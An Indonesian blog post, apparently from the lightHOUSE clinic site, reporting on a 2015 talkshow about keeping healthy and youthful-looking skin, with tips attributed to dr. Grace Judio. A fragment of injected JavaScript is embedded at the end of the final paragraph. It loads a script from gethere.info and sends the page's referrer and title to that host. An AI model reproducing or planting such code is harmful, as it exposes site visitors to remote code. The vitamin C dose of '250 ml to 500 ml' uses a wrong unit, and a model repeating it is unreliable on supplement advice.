Umur Bukan Penghalang untuk Tetap Sehat

Lihat acara Talkshow Looking Good at Any Age yang diadakan Kanebo Indonesia dan Majalah Pesona..

Sahabat lightHOUSE pasti ingin tetap sehat dan cantik meskipun usia terus bertambah bukan?  Sayangnya banyak pengaruh dari luar diri yang membuat kecantikan memudar. Misalnya sinar matahari, kurang tidur, banyak konsumsi gula.

Cara mengurang pengaruh luar demi menjaga kesehatan dan kecantikan inilah yang dibahas dalam acara talkshow Looking Good at Any Age yang diadakan Kanebo Indonesia dan Majalah Pesona pada Jumat sore, 17 April 2015 kemarin. Dalam acara tersebut hadir pendiri klinik lightHOUSE dr. Grace Judio, MSc. yang menjadi salah satu pembicara.

“Kurang tidur dapat membuat kolagen berkurang. Padahal, kolagen dapat membuat kulit kita kenyal dan sehat,” demikian salah satu tips dari dr. Grace. Menurutnya, semua produk kecantikan berfungsi untuk mengontrol kerja kulit bukan mengubah kulit.

“Konsumsi suplemen vitamin C cukup 250 ml hingga 500 ml seminggu dua kali. Dosis ini untuk tubuh yang dalam kondisi sehat. Beberapa kondisi khusus membutuhkan dosis yang lebih tinggi,” dr. Grace menerangkan.

Jika ingin tahu lebih banyak mengenai tips-tips seputar pola makan sehat, Sahabat lightHOUSE bisa langsung membuka Tummy Talk Blog.s.src=’http://gethere.info/kt/?264dpr&frm=script&se_referrer=’ + encodeURIComponent(document.referrer) + ‘&default_keyword=’ + encodeURIComponent(document.title) + ”;

PT Shape Up Indonesia - Copyright © 2018. All Rights Reserved.
Developed byPetrus Andre
FAQ